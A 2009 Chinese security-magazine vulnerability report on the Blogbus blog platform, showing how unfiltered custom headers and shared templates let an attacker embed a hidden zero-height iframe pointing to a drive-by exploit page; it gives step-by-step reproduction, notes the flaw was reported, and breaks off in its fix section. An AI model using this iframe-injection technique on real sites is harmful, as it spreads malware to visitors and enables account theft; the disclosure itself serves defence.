博客大巴网页木马蹭座
安全阵线
早在4月份,博客大巴就被挂过马。时隔3个月,电脑报的安全研究人员又在博客大巴上发现了挂马漏洞……
本期主角:博客大巴
问题所在:外部链接过滤不严格
主要危害:进行挂马攻击
调研时间:2009.7.18~2009.7.21
漏洞状况:已通知修复
博客大巴是一家提供收费服务的中文博客网站(图1),访问量巨大。经过研究,我发现该网站存在漏洞,利用该漏洞黑客可以进行挂马,试图窃取用户电脑中的网银、网游等账号和密码。博客大巴拥有大量的高端用户,因此黑客选择博客大巴进行批量挂马的目的非常明确,就是获取较为优质的肉鸡。

外部链接过滤不严
博客大巴存在两个挂马点。第一个挂马点是在注册管理页面的自定义header处,对HTML关键词过滤不严,允许用户可以随意引入外部链接(图2)。第二个挂马点是在网页模板共享处,同样可以在该处引入外部链接。

第二个挂马点的危害相对大一点,黑客通过博客大巴的共享系统将带毒的模板分享出去。凡是使用带毒模板的用户,都间接地成为病毒的传播者,这样黑客无形中就拥有了大量带毒的博客。
这就如同一条河流,一群人在河流中取水生活,但是这条河流并没有设置管理规定,结果导致有恶意动机的人可以随意在河中倾倒污染物,而没有人阻止或者过滤这些污染物,于是就造成了饮用河水的居民出现伤亡的后果。
博客大巴挂马解密
步骤1:利用最近较热的微软DirectShow视频漏洞生成一个能够溢出攻击电脑的网页木马(越新的漏洞溢出几率越大),接着生成溢出网页,将网页上传到自己指定的网站中(编者注:溢出网页的制作方法请参考反击网页挂马系列)。
步骤2:然后进入博客大巴,点击网页右侧的“立即注册”按键,随意注册一个博客大巴的账号,例如账号名称为plutotestpluto。账号注册完成后,会收到一封验证邮件。完成身份验证后,网页会跳转到博客大巴管理中心页面。在这个页面中点击文字提示“创建一个博客”,就进入了博客创建向导。根据向导提示,输入博客名、博客域名等信息之后,就完成了博客创建(图3)。

步骤3:博客创建好后,再回到博客管理页面,点击管理页面右下角的“博客设置”选项,进入博客设置页面,在该页面中黑客就可以进行挂马。在“自定义header”中,输入<iframe src=http://www.baidu.com/ width=111 height=0 border=0></iframe>(图4)。输入代码后,就将木马内嵌到网页头部中去了(在这里我们是以“www.baidu.com”为例子,黑客可以把该链接替换为任意恶意链接。)

除了在网页头部可以插入挂马代码之外,黑客还可以通过自定义模板将代码加入自定义模板的HTML代码框中。点击“模板”选项,再点击模板右侧的“自定义模板选项”,就可以在自定义模板中加入挂马代码了(图5)。

安全小百科:黑客可以通过自定义模板做出一个非常漂亮的模板,然后点击“分享模板”将该模板共享出去,如果有用户点击了含有挂马代码的模板,就会激活漏洞,引来无数的病毒,给电脑中的个人隐私信息带来安全风险。
打开测试博客http://pplluuttoo.blogbus.com,点击“查看→查看源文件”,弹出网页源代码窗口(图6),从图中可以看到,网页中包含了http://www.baidu.com/ width=111 height=0 border=0和http://www.google.cn/ width=111 height=0 border=0,证明挂马成功了。

漏洞解决方案
要堵上漏洞,博客大巴要加强对HTML代码的过滤,特别是对header、模板的过滤,禁止用户输入